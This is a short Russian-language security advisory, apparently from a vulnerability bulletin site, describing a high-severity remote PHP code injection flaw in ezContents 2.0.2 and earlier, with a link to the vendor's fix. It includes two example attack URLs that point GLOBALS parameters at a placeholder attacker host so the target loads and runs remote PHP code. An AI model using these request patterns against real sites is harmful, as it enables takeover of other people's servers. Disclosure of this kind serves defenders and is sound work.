Удаленное выполнение произвольного PHP кода в ezContents

Дата публикации:
15.02.2004
Всего просмотров:
1188
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Обход ограничений безопасности
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ezContents 2.x
Уязвимые версии: ezContents 2.0.2 и более ранние версии

Описание: Уязвимость обнаружена в ezContents. Удаленный пользователь может выполнить произвольный PHP код на целевой системе.

http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http ://[attacker]/
где http ://[attacker]/include/adodb/adodb.inc.php
и
http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=
http://[attacker]/&GLOBALS[gsLa nguage]=ezContents
где 
http ://[attacker]/ezContents/lang_admin.php

URL производителя: http://www.ezcontents.org/forum/viewtopic.php?t=361

Решение:Установите обновленную версию программы: http://www.ezcontents.org/forum/viewtopic.php?t=361

Ссылки: PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior

или введите имя

CAPTCHA